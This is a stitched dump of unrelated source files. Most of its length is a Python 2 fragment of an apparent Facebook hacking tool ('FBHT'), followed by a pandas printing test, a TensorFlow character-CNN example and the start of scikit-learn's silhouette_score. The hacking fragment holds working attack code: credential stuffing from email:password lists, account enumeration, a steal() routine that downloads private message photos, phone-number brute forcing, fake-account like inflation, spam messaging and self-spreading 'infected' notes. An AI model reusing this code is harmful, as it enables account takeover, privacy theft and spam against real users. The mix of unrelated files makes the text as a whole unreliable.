except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
logs('Error in the DDoS module')
print '\rError in the DDoS module\r'
raise
def devTest(appID):
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
br.open('https://developers.facebook.com/').read()
arguments = {
'fb_dtsg' : fb_dtsg,
'count' : '4',
'app_id' : str(appID),
'install_app' : '1',
'platform_version' : 'v2.0',
'enable_ticker' : '1',
'language' : 'en_US',
'__user' : getC_user(),
'__a' : '1',
'__dyn' : '7w86i1PyUnxqnFwn8',
'__req' : '3',
'ttstamp' : '2658172110116109767311810511273',
'__rev' : '1262242'
}
datos = urlencode(arguments)
response = br.open('https://developers.facebook.com/apps/async/test-users/create/',datos)
except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
logs('Error in devTest module')
print '\rError in devTest module\r'
raise
'''
def getTest(appID):
try:
response = br.open('https://developers.facebook.com/apps/'+appID+'/roles/test-users/')
linea = response.read()
lines = []
match = re.search('test_users'+'(.+)',linea)
if match is not None:
encontrada = match.group()
start = 0
while True:
matchstart = re.search('test_user_ids',encontrada[start:])
if matchstart is not None:
matchend = re.search('\.net',encontrada[start+matchstart.end():])
if (matchstart is not None) and (matchend is not None):
final = encontrada[start+matchstart.start() : matchend.end()+start+matchstart.end()]
lines.append(final)
start = start+matchstart.start()+matchend.end()
else:
break
email = []
name = []
userid = []
for linea in lines:
matchstart =re.search('value="',linea)
matchend = re.search('"',linea[matchstart.end():])
userid.append(linea[matchstart.end():matchstart.end()+matchend.start()])
for linea in lines:
start=0
while True:
matchstart = re.search("\"_50f4\">",linea[start:])
if matchstart is not None:
matchend = re.search('</span>',linea[start+matchstart.end():])
if (matchstart is not None) and (matchend is not None):
final = linea[start+matchstart.end() : matchend.start()+start+matchstart.end()]
name.append(final)
start = start+matchstart.start()+matchend.end()
matchstart = re.search("_5jxf\"><span class=\"_50f4\">",linea[start:])
if matchstart is not None:
email.append(linea[matchstart.end()+start:].replace('@','@'))
break
else:
print 'error'
else:
break
for elements in email:
print elements
for elements in name:
print elements
for elements in userid:
print elements
except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
logs('Error in getTest module')
print '\rError in getTest module\r'
raise
'''
def getTest(appID):
try:
start = 0
flag = 0
while flag != -1:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'start' : str(start),
'__user' : getC_user(),
'__a' : '1',
'__dyn' : '7w86i1PyUnxqnFwn8',
'__req' : '4',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '26581707111311350113871144898',
'__rev' : '1262242'
}
datos = urlencode(arguments)
try:
response = br.open('https://developers.facebook.com/apps/'+appID+'/roles/test-users/paging/',datos)
aParsear = response.read().strip("for (;;);")
json_dump = json.loads(aParsear)
flag = MyParser.parceros(json_dump)
start+=20
except:
break
except:
print 'general error'
def changePassword(appID):
people = database.getUsers()
peopleLogged = database.getUsersNotLogged()
for persona in people:
if persona in peopleLogged:
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'fb_dtsg' : fb_dtsg,
'name' : str(persona[1]),
'password' : '1234567890',
'confirm_password' : '1234567890',
'__user' : getC_user(),
'__a' : '1',
'__dyn' : '7w86i1PyUnxqnFwn8',
'__req' : 'a',
'ttstamp' : '26581698582558910610211811276',
'__rev' : '1262776'
}
datos = urlencode(arguments)
try:
response = br.open('https://developers.facebook.com/apps/async/test-users/edit/?app_id='+appID+'&test_user_id='+str(persona[0]),datos)
except:
print 'error'
except:
print 'Error General'
def likeDev(postId):
signal.signal(signal.SIGINT, signal_handler)
try:
#Cookie of the real account
masterCookie = cj._cookies
massLoginTest()
if len(cookieArray) == 0:
print 'First you must create accounts: option 1) '
quantity = raw_input('Insert the amount of likes: ')
while int(quantity) <= 0 or int(quantity) >= len(cookieArray):
print 'Wrong quantity. First you must create enough accounts for that amount of likes .. (option 1) ..'
quantity = raw_input('Insert the amount of likes: ')
#Percentage container
percentage = 0.0
j = 0.0
total = int(quantity) * len(postId)
#flush
print '\r \r',
for i in range(int(quantity)):
for post in range(len(postId)):
cj._cookies = cookieArray[i]
c_user = getC_user()
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'like_action' : 'true',
'ft_ent_identifier' : str(postId[post]),
'source' : '0',
'client_id' : str(c_user)+'%3A4047576437',
'rootid' : 'u_0_2o',
'giftoccasion' : '',
'ft[tn]' : '%3E%3D',
'ft[type]' : '20',
'nctr[_mod]' : 'pagelet_timeline_recent',
'__user' : c_user,
'__a' : '1',
'__dyn' : '7n8ahyj35ym3KiA',
'__req' : 'c',
'fb_dtsg' : fb_dtsg,
'phstamp' : '165816595797611370260',
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/ufi/like.php',datos)
if globalLogging:
logs(response.read())
percentage = (j * 100.0)/total
flush()
print '\r[%.2f%%] of likes completed\r' %(percentage),
j+=1
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
print 'Unknown error'
cj._cookies = masterCookie
raw_input('Finished like() module, press enter to continue')
except signalCaught as e:
deleteUser()
message = '%s catch from create module' %e.args[0]
logs(str(message))
print '%s \n' %message
raw_input('Press enter to continue')
return
def massMessage(page,message):
import random
massLoginTest()
if len(cookieArray) == 0:
print 'First you must create accounts: option 1) '
return
pageID = getUserID(page)
for i in range(len(cookieArray)):
try:
cj._cookies = cookieArray[i]
c_user = getC_user()
print str(c_user)+'\n'
numero = ''
numero2 = ''
for i in range(10):
numero += str(random.randrange(0,10))
for i in range(10):
numero2 += str(random.randrange(0,10))
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'message_batch[0][action_type]' : 'ma-type:user-generated-message',
'message_batch[0][author]' : 'fbid:'+c_user,
'message_batch[0][timestamp]' : '1401416840784',
'message_batch[0][timestamp_absolute]' : 'Today',
'message_batch[0][timestamp_relative]' : '11:27pm',
'message_batch[0][timestamp_time_passed]' : '0',
'message_batch[0][is_unread]' : 'false',
'message_batch[0][is_cleared]' : 'false',
'message_batch[0][is_forward]' : 'false',
'message_batch[0][is_filtered_content]' : 'false',
'message_batch[0][is_spoof_warning]' : 'false',
'message_batch[0][source]' : 'source:titan:web',
'message_batch[0][body]' : message,
'message_batch[0][has_attachment]' : 'false',
'message_batch[0][html_body]' : 'false',
'message_batch[0][specific_to_list][0]' : 'fbid:'+pageID,
'message_batch[0][specific_to_list][1]' : 'fbid:'+c_user,
'message_batch[0][force_sms]' : 'true',
'message_batch[0][ui_push_phase]' : 'V3',
'message_batch[0][status]' : '0',
'message_batch[0][message_id]' : '<1401416840784:'+numero+'-'+numero2+'@mail.projektitan.com>',
'''<1401416840784:554304545-874733751@mail.projektitan.com>','''
'message_batch[0][client_thread_id]' : 'user:'+pageID,
'client' : 'mercury',
'__user' : c_user,
'__a' : '1',
'__dyn' : '7n8ajEAMCBynUKt2u6aOGeExEW9ACxO4pbGA8AGGBy6C-Cu6popDFp4qu',
'__req' : 'q',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '26581697273111715585898748',
'__rev' : '1268876'
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/mercury/send_messages.php',datos)
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
logs('Error en el modulo de massMessage()')
print 'Error en el modulo de massMessage()\n'
def logTestUser(testUser):
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
c_user = getC_user()
arguments = {
'user_id' : testUser,
'__user' : c_user,
'__a' : '1',
'__dyn' : '7w86i3S2e4oK4pomXWo4CE-',
'__req' : '2',
'ttstamp' : '2658172826512290796710073107',
'__rev' : '1270592',
'fb_dtsg' : fb_dtsg,
}
datos = urlencode(arguments)
response = br.open('https://developers.facebook.com/checkpoint/async/test-user-login/dialog/',datos)
dump = json.loads(response.read().strip("for (;;);"))
line = dump['jsmods']['markup'][0][1]['__html']
match= re.search('\"n\"',line)
if match != None:
matchBis = re.search('value=\"',line[match.end():])
matchBisBis = re.search('"',line[match.end()+matchBis.end():])
code = line[match.end()+matchBis.end():match.end()+matchBis.end()+matchBisBis.start()]
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments['fb_dtsg'] = fb_dtsg
arguments['n'] = str(code)
datos = urlencode(arguments)
response = br.open('https://developers.facebook.com/checkpoint/async/test-user-login/',datos)
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
def massLoginTest():
import copy
i = int(0)
people = database.getUsersNotLogged()
#Flush
print '\r \r',
masterCj = copy.deepcopy(cj._cookies)
loadPersistentCookie()
for person in people:
#login
try:
cj._cookies = copy.deepcopy(masterCj)
if person[4] == 0:
logTestUser(str(person[0]))
cookieArray.append(cj._cookies)
print cj._cookies #DEBUG
cj.clear()
#percentage
i+=1
percentage = (i * 100.0) / len(people)
flush()
print '\rCompleted [%.2f%%]\r'%percentage,
except:
print 'Error with user %s' %person[0]
continue
cj.clear()
savePersistentCookie()
def plotDOT(victim):
root = 'dumps'
directory = victim
mkdir(directory,root)
graph = open(root+"\\"+directory+"\\"+victim+"_graph.dot","wb")
graph.write("Graph {\n")
victim = victim.replace(".","_")
nodes = database.getNodes(victim)
for node in nodes:
graph.write(" "+victim.replace("_",".")+" -> "+node[0]+";\n")
edges = database.getEdges(victim,node[0],node[1])
try:
edgeList = edges[0][2].split(';')
writed = []
for individual in edgeList:
if individual != "" and individual not in writed:
graph.write(" "+node[0]+" -> "+str(individual)+";\n")
writed.append(individual)
except:
print 'No edges for %s' %node[0]
graph.write("}")
graph.close()
def dotFileDatabase(victim, transitive):
#Percentage container
percentage = 0.0
#Disclosude friends container
friendships = []
#Already visited nodes container
visited = []
try:
#Generates the first level of the search
result = coreFriendshipPrivacy(victim,transitive)
except:
print 'Check the internet connection please..'
return
#Stores non repetitive values in the disclosed friends container
transitivo = getName(transitive)
transitivoID = getUserID(transitive)
if transitivoID == -1:
transitivoID = transitivo
database.addNode(victim,transitivo, transitivoID)
for individuos in result:
friendName = getName(individuos)
friendId = getUserID(individuos)
if friendId == -1:
friendId = friendName
database.addNode(victim,friendName, friendId)
database.addEdge(victim,transitivo, transitivoID, friendName, friendId)
friendships.append(individuos)
#Counter for percentage calculus purpose
i = 0.0
#flush
print '\r \r',
#For every value in the first disclosed list, repeats until every value has been tryed
for friends in friendships:
#Percentage calculus
percentage = (i * 100.0)/len(friendships)
flush()
print '\rIterating on %d of %d - [%.2f%%] completed\r' %(i ,len(friendships), percentage),
i+=1
#Only if the node wasn't visited
if friends not in visited:
#if coreFriendshipPrivacy() fails, an exception is caught. Therefore, state wis still being True.
#Only if the try passes, the infinite while will end. (For internet error connection problem)
state = True
while state == True:
try:
result = coreFriendshipPrivacy(victim,friends)
state = False
except signalCaught as e:
state = False
print 'Signal Caught handler'
print '%s ' %e.args[0]
return
except:
logs('Check the internet connection please.. Press enter when it\'s done')
print '\r \r',
a = raw_input('\rCheck the internet connection please.. Press enter when it\'s done\r')
if a == 1:
state = False
else:
if a == 2:
email,password = setMail()
login(email,password,'real')
#Stores non repetitive values in the disclosed friends container
friendName = getName(friends)
friendId = getUserID(friends)
if friendId == -1:
friendId = friendName
database.addNode(victim,friendName, friendId)
for element in result:
if element not in friendships:
friendTran = getName(element)
friendTranId = getUserID(element)
if friendId == -1:
friendId = friendName
database.addNode(victim,friendTran, friendTranId)
database.addEdge(victim,friendName, friendId, friendTran, friendTranId)
friendships.append(element)
#Stores every single value of friendships list alredy analyzed for non repetitivness
visited.append(friends)
def simpleDotGraphDatabase(friends, victim):
for friend in friends:
try:
mutual = coreFriendshipPrivacy(victim, friend)
except:
continue
transitive = getName(friend)
transitiveID = getUserID(friend)
if transitiveID == -1:
transitiveID = transitive
database.addNode(victim,transitive, transitiveID)
for element in mutual:
mutualFriend = getName(element)
mutualFriendID = getUserID(element)
if mutualFriendID == -1:
mutualFriendID = mutualFriend
database.addNode(victim,mutualFriend, mutualFriendID)
database.addEdge(victim,transitive, transitiveID, mutualFriend, mutualFriendID)
def friendlyLogout(noteID,privacy):
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
return
existence = raw_input("Share an existent infected note? 1|0: ")
title = raw_input('Note title: ')
content = ''
for i in range(0,10):
content += '<p><img src="http://www.facebook.com/n/?home.php&clk_loc=5&mid=72b01a8G5af400143243G0Gd4&bcode=1.1354826874.AbllucLcWqHQbSNM&n_m=hackedby@chinoogawa-'+str(i)+'"/></p>'
arguments = {
'fb_dtsg' : fb_dtsg,
'object_id' : noteID,
'note_id' : noteID,
'id' : getC_user(),
'title' : title,
'note_content' : content,
'audience['+noteID+'][value]' : privacy,
'publish' : 'Publish',
'__user' : getC_user(),
'__a' : '1',
'__dyn' : '7n8ahyj34fzpQ9UoHaEWy1m9ACwKyaF3pqzCAjFDxCm6qyE',
'__req' : '7',
'ttstamp' : '2658169897154120115496511690',
'__rev' : '1224624'
}
datos = urlencode(arguments)
try:
response = br.open('https://www.facebook.com/ajax/notes/edit',datos)
except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
logs('Error in the friendlyLogout module')
print '\rError in the friendlyLogout module\r'
raise
arguments = {
'fb_dtsg' : fb_dtsg,
'app_id' : '2347471856',
'redirect_uri' : 'https://www.facebook.com/',
'display' : 'popup',
'access_token' : '',
'sdk' : '',
'from_post' : '1',
'e2e' : '{"submit_0":1409803100561}',
'xhpc_context' : 'home',
'xhpc_ismeta' : '1',
'xhpc_timeline' : '',
'xhpc_targetid' : getC_user(),
'xhpc_publish_type' : '1',
'xhpc_message_text' : '#FBHT rocks! #HackThePlanet! @chinoogawa powered by @MkitArgentina ',
'xhpc_message' : '#FBHT rocks! #HackThePlanet! @chinoogawa powered by @MkitArgentina ',
'is_explicit_place' : '',
'composertags_place' : '',
'composertags_place_name' : '',
'tagger_session_id' : '1409803081',
'action_type_id[0]' : '',
'object_str[0]' : '',
'object_id[0]' : '',
'og_location_id[0]' : '',
'hide_object_attachment' : '0',
'og_suggestion_mechanism' : '',
'og_suggestion_logging_data' : '',
'icon_id' : '',
'share_action_properties' : '{"object":"https:\/\/www.facebook.com\/notes\/'+getName(getC_user())+'\/'+noteID+'\/'+noteID+'"}',
'share_action_type_id' : '400681216654175',
'composertags_city' : '',
'disable_location_sharing' : 'false',
'composer_predicted_city' : '',
'audience[0][row_updated_time]' : '1409803103',
'audience[0][custom_value]' : privacy,
'audience[0][value]' : '111',
'__CONFIRM__' : '1',
'__user' : getC_user(),
'__a' : '1',
'__dyn' : '7xu5V84Oi3S2e4oK4pomXWomwho4a',
'__req' : '7',
'ttstamp' : '26581715110910598979511876122',
'__rev' : '1398396'
}
datos = urlencode(arguments)
try:
response = br.open('https://www.facebook.com/v1.0/dialog/share/submit',datos)
except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
logs('Error in the friendlyLogout module')
print '\rError in the friendlyLogout module\r'
raise
def takePhotos(threads):
r = open(os.path.join("massive","fotos.txt"),"wb")
fb_dtsg = set_dtsg()
f = open(os.path.join("massive",threads),"r")
threadList = []
while True:
linea = f.readline()
if not linea:
break
threadList.append(str(linea.strip("\n")))
i = 0
for message in threadList:
arguments = {
'thread_id' : message,
'offset' : '0',
'limit' : '30',
'__user' : getC_user(),
'__a' : '1',
'__dyn' : 'aJj2BW9t2lm9b88DgDDx2IGAKh9VoW9J6yUgByVbFkGQhbHz6C-CEy5pokAWAVbGFQiuaBKAqhB-imSCiZ3oyq4U',
'__req' : '40',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '265816973899779122887410295',
'__rev' : '1458973'
}
datos = urlencode(arguments)
try:
response = br.open('https://www.facebook.com/ajax/messaging/attachments/sharedphotos.php',datos)
text = response.read()
r.write(text + '\n')
except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
logs('Error in robo de fotos')
print '\rError in robo de fotos\r'
raise
try:
to_parse = str(text).strip('for (;;);')
resultado = json.loads(to_parse)
URLS = []
for element in resultado['payload']['imagesData'].keys():
URLS.append(resultado['payload']['imagesData'][element]['URI'])
for URL in URLS:
fotos = open(os.path.join('massive','photos',str(int(time()))+'.jpg'),"wb")
handler = br.open(URL)
fotos.write(handler.read())
fotos.close()
i += 1
URLS[:]
except:
print 'no attachment in thread'
r.close()
def accountexists(mailList):
password = '#FBHTEnumerateUsers'
mails = []
try:
mailFile = open(os.path.join("PRIVATE",mailList),"r")
except:
print 'File %s doesn\'t exist' %mailList
return
try:
verified = open(os.path.join("PRIVATE","existence","verified.txt"),"a")
verified.close()
except:
verified = open(os.path.join("PRIVATE","existence","verified.txt"),"w")
verified.close()
while True:
line = mailFile.readline()
if not line: break
mails.append(line.strip('\n'))
mailFile.close()
driver = webdriver.Firefox()
for email in mails:
# Access the login page to get the forms
driver.delete_all_cookies()
driver.get("https://www.facebook.com/")
assert "Facebook" in driver.title
elem = driver.find_element_by_name("email")
elem.send_keys(email)
elem = driver.find_element_by_name("pass")
elem.send_keys(password)
elem.send_keys(Keys.RETURN)
try:
line = driver.page_source
match = re.search('Por favor, vuelve a introducir tu contrase',line)
if match is not None:
print email + ' Cuenta existente :D !!'
verified = open(os.path.join("PRIVATE","existence","verified.txt"),"a")
verified.write(email + '\n')
verified.close()
else:
print email + ' Cuenta inexistente :('
except:
logs('Fatal error while submitting the login form')
print '\rFatal error while submitting the login form\r'
driver.close()
verified.close()
def checkLogin(mailList):
global blocked
try:
verified = open(os.path.join("PRIVATE","loggedin","Loggedin.txt"),"a")
except:
verified = open(os.path.join("PRIVATE","loggedin","Loggedin.txt"),"w")
try:
mails = open(os.path.join("PRIVATE",mailList),"r")
except:
print '%s doesn\'t exist in PRIVATE folder' %mailList
verified.close()
return
credenciales = {}
while True:
email = mails.readline()
if not email: break
index = email.find(":")
if index != -1:
credenciales[email[0:index]] = email[index+1:].strip('\n')
for emails in credenciales.keys():
if (login(emails,credenciales[emails],'real') != -1) or (blocked == 1):
verified = open(os.path.join("PRIVATE","loggedin","Loggedin.txt"),"a")
verified.write(emails+':'+credenciales[emails]+'\n')
verified.close()
print emails + ' valid email and passowrd!!! MOTHER KAKERRRRR :D '
blocked = 0
else:
print emails + ' not valid email or password'
try:
verified.close()
except:
return
def steal():
global blocked
try:
verified = open(os.path.join("PRIVATE","loggedin","Loggedin.txt"),"r")
except:
print 'File Loggedin.txt not found in loggedin folder, you should try it again!'
return
credenciales = {}
while True:
email = verified.readline()
if not email: break
index = email.find(":")
if index != -1:
credenciales[email[0:index]] = email[index+1:].strip('\n')
for emails in credenciales.keys():
if (login(emails,credenciales[emails],'real') != -1) or (blocked == 1):
print emails + ' valid email and passowrd!!! MOTHER KAKERRRRR :D '
if blocked == 1:
blocked = 0
print 'Account valid, but blocked due to location issues'
else:
check = checkPrivacy('me')
friendList, friendsName = friendshipPlot(check,'me')
fileThreads = open(os.path.join("massive","threads.txt"),"wb")
for friends in friendList:
fileThreads.write(friends+'\n')
fileThreads.close()
takePhotos("threads.txt")
else:
sleep(10)
print emails + ' not valid email or password'
def sendPrivateMessage(message,buddy):
c_user = getC_user()
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'message_batch[0][action_type]' : 'ma-type:user-generated-message',
'message_batch[0][thread_id]' : '',
'message_batch[0][author]' : 'fbid:'+c_user,
'message_batch[0][author_email]' : '',
'message_batch[0][coordinates]' : '',
'message_batch[0][timestamp]' : str(int(time())),
'message_batch[0][timestamp_absolute]' : 'Today',
'message_batch[0][timestamp_relative]' : getTime(),
'message_batch[0][timestamp_time_passed]' : '0',
'message_batch[0][is_unread]' : 'false',
'message_batch[0][is_forward]' : 'false',
'message_batch[0][is_filtered_content]' : 'false',
'message_batch[0][is_filtered_content_bh]' : 'false',
'message_batch[0][is_filtered_content_account]' : 'false',
'message_batch[0][is_filtered_content_quasar]' : 'false',
'message_batch[0][is_filtered_content_invalid_app]' : 'false',
'message_batch[0][is_spoof_warning]' : 'false',
'message_batch[0][source]' : 'source:titan:web',
'message_batch[0][body]' : message,
'message_batch[0][has_attachment]' : 'false',
'message_batch[0][html_body]' : 'false',
'message_batch[0][specific_to_list][0]' : 'fbid:' + buddy,
'message_batch[0][specific_to_list][1]' : 'fbid:' + c_user,
'message_batch[0][force_sms]' : 'true',
'message_batch[0][ui_push_phase]' : 'V3',
'message_batch[0][status]' : '0',
'message_batch[0][message_id]' : '<1394766424499:3126670212-4125121119@mail.projektitan.com>',
'message_batch[0][client_thread_id]' : 'user:'+str(c_user),
'message_batch[0][manual_retry_cnt]' : '0',
'client' : 'web_messenger',
'__user' : c_user,
'__a' : '1',
'__dyn' : 'aKTyBW8BgBlyibgggDDzbHaF8x9DzECQHyUmyVbGAGQi8VpCC-KGBxmm6oxpbGES5V8Gh6VEChyd1eFEsz-dCxK9xibyfCChQEjkwzyAAEnhRGeKmhmKVRz9Hxmi8V9-i78',
'__req' : '1w',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '2658171975212154891167782118',
'__rev' : '1925563'
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/mercury/send_messages.php',datos)
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
print 'Ctrl+c SIGNAL Caught\n'
return
def sendBroadcast(online):
print 'Cookies will be saved and deleted after execution'
try:
driver = webdriver.Firefox()
driver.get("https://www.facebook.com/")
cookies = pickle.load(open("cookies.pkl", "rb"))
for cookie in cookies:
driver.add_cookie(cookie)
open("cookies.pkl", "wb").close()
driver.get("https://m.facebook.com/buddylist.php?ref_component=mbasic_home_header&ref_page=/wap/home.php&refid=8")
assert "Active Friends" in driver.title
data = driver.page_source
driver.close()
buddies = MyParser.parseOnline(data)
if len(buddies) == 0:
print 'Mmm houston we have a problem.. ERROR'
return
message = raw_input('Enter the message to send: ')
percentage = 0.0
i = 0
for buddy in buddies:
flush()
percentage = (100.0 * i)/len(buddies)
print '\rCompleted [%.2f%%]\r'%percentage,
sendPrivateMessage(message, buddy)
i += 1
except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
logs('Error in the sendBroadcast module')
print '\rError in the sendBroadcast module\r'
raise
def bruteforceCel(first,start,end):
c_user = getC_user()
try:
f = open( os.path.join("cellphones","cellphones.txt"),"a" )
f.close()
except:
f = open( os.path.join("cellphones","cellphones.txt"),"wb" )
f.close()
percentage = 0.0
verified = 0
for cellphone in range(int(start),int(end)):
percentage = ((cellphone-int(start)) * 100.0) / (int(end) - int(start))
flush()
print '\rCompleted [%.6f%%] - %d cellphone - %d verified\r' %(percentage, cellphone, verified),
try:
response = br.open('https://www.facebook.com/typeahead/search/facebar/query/?value=["'+first+str(cellphone)+'"]&context=facebar&grammar_version=7466c20ac89f47d6185f3a651461c1b1bac9a82d&content_search_mode&viewer='+c_user+'&rsp=search&qid=8&max_results=10&sid=0.24097281275317073&__user='+c_user+'&__a=1&__dyn=7nmajEyl2qm9udDgDxyIGzGpUW9ACxO4p9GgyimEVFLFwxBxCbzESu49UJ6K59poW8xHzoyfw&__req=1o&__rev=1536505')
text = response.read()
json_dump = json.loads(text.strip('for (;;);'))
#print str(json_dump['payload']['entities'][0]['path'])
#print str(json_dump['payload']['entities'][0]['uid'])
#print first + str(cellphone)
f = open( os.path.join("cellphones","cellphones.txt"),"a" )
f.write(first + str(cellphone)+' '+str(json_dump['payload']['entities'][0]['path']) + ' ' + str(json_dump['payload']['entities'][0]['uid'])+'\n')
f.close()
verified += 1
except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
f.close()
continue
| bsd-2-clause |
gfyoung/pandas | pandas/tests/extension/base/printing.py | 5 | 1167 | import io
import pytest
import pandas as pd
from .base import BaseExtensionTests
class BasePrintingTests(BaseExtensionTests):
"""Tests checking the formatting of your EA when printed."""
@pytest.mark.parametrize("size", ["big", "small"])
def test_array_repr(self, data, size):
if size == "small":
data = data[:5]
else:
data = type(data)._concat_same_type([data] * 5)
result = repr(data)
assert type(data).__name__ in result
assert f"Length: {len(data)}" in result
assert str(data.dtype) in result
if size == "big":
assert "..." in result
def test_array_repr_unicode(self, data):
result = str(data)
assert isinstance(result, str)
def test_series_repr(self, data):
ser = pd.Series(data)
assert data.dtype.name in repr(ser)
def test_dataframe_repr(self, data):
df = pd.DataFrame({"A": data})
repr(df)
def test_dtype_name_in_info(self, data):
buf = io.StringIO()
pd.DataFrame({"A": data}).info(buf=buf)
result = buf.getvalue()
assert data.dtype.name in result
| bsd-3-clause |
naturali/tensorflow | tensorflow/examples/skflow/text_classification_character_cnn.py | 6 | 4109 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This is an example of using convolutional networks over characters
for DBpedia dataset to predict class from description of an entity.
This model is similar to one described in this paper:
"Character-level Convolutional Networks for Text Classification"
http://arxiv.org/abs/1509.01626
and is somewhat alternative to the Lua code from here:
https://github.com/zhangxiangxiao/Crepe
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from sklearn import metrics
import pandas
import tensorflow as tf
from tensorflow.contrib import learn
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_bool('test_with_fake_data', False,
'Test the example code with fake data.')
MAX_DOCUMENT_LENGTH = 100
N_FILTERS = 10
FILTER_SHAPE1 = [20, 256]
FILTER_SHAPE2 = [20, N_FILTERS]
POOLING_WINDOW = 4
POOLING_STRIDE = 2
def char_cnn_model(x, y):
"""Character level convolutional neural network model to predict classes."""
y = tf.one_hot(y, 15, 1, 0)
byte_list = tf.reshape(learn.ops.one_hot_matrix(x, 256),
[-1, MAX_DOCUMENT_LENGTH, 256, 1])
with tf.variable_scope('CNN_Layer1'):
# Apply Convolution filtering on input sequence.
conv1 = tf.contrib.layers.convolution2d(byte_list, N_FILTERS,
FILTER_SHAPE1, padding='VALID')
# Add a RELU for non linearity.
conv1 = tf.nn.relu(conv1)
# Max pooling across output of Convolution+Relu.
pool1 = tf.nn.max_pool(conv1, ksize=[1, POOLING_WINDOW, 1, 1],
strides=[1, POOLING_STRIDE, 1, 1], padding='SAME')
# Transpose matrix so that n_filters from convolution becomes width.
pool1 = tf.transpose(pool1, [0, 1, 3, 2])
with tf.variable_scope('CNN_Layer2'):
# Second level of convolution filtering.
conv2 = tf.contrib.layers.convolution2d(pool1, N_FILTERS,
FILTER_SHAPE2,
padding='VALID')
# Max across each filter to get useful features for classification.
pool2 = tf.squeeze(tf.reduce_max(conv2, 1), squeeze_dims=[1])
# Apply regular WX + B and classification.
prediction, loss = learn.models.logistic_regression(pool2, y)
train_op = tf.contrib.layers.optimize_loss(
loss, tf.contrib.framework.get_global_step(),
optimizer='Adam', learning_rate=0.01)
return {'class': tf.argmax(prediction, 1), 'prob': prediction}, loss, train_op
def main(unused_argv):
# Prepare training and testing data
dbpedia = learn.datasets.load_dataset(
'dbpedia', test_with_fake_data=FLAGS.test_with_fake_data, size='large')
x_train = pandas.DataFrame(dbpedia.train.data)[1]
y_train = pandas.Series(dbpedia.train.target)
x_test = pandas.DataFrame(dbpedia.test.data)[1]
y_test = pandas.Series(dbpedia.test.target)
# Process vocabulary
char_processor = learn.preprocessing.ByteProcessor(MAX_DOCUMENT_LENGTH)
x_train = np.array(list(char_processor.fit_transform(x_train)))
x_test = np.array(list(char_processor.transform(x_test)))
# Build model
classifier = learn.Estimator(model_fn=char_cnn_model)
# Train and predict
classifier.fit(x_train, y_train, steps=100)
y_predicted = [
p['class'] for p in classifier.predict(x_test, as_iterable=True)]
score = metrics.accuracy_score(y_test, y_predicted)
print('Accuracy: {0:f}'.format(score))
if __name__ == '__main__':
tf.app.run()
| apache-2.0 |
LiaoPan/scikit-learn | sklearn/metrics/cluster/unsupervised.py | 230 | 8281 | """ Unsupervised evaluation metrics. """
# Authors: Robert Layton <robertlayton@gmail.com>
#
# License: BSD 3 clause
import numpy as np
from ...utils import check_random_state
from ..pairwise import pairwise_distances
def silhouette_score(X, labels, metric='euclidean', sample_size=None,
random_state=None, **kwds):
"""Compute the mean Silhouette Coefficient of all samples.
The Silhouette Coefficient is calculated using the mean intra-cluster
distance (``a``) and the mean nearest-cluster distance (``b``) for each
sample. The Silhouette Coefficient for a sample is ``(b - a) / max(a,
b)``. To clarify, ``b`` is the distance between a sample and the nearest
cluster that the sample is not a part of.
Note that Silhouette Coefficent is only defined if number of labels
is 2 <= n_labels <= n_samples - 1.
This function returns the mean Silhouette Coefficient over all samples.
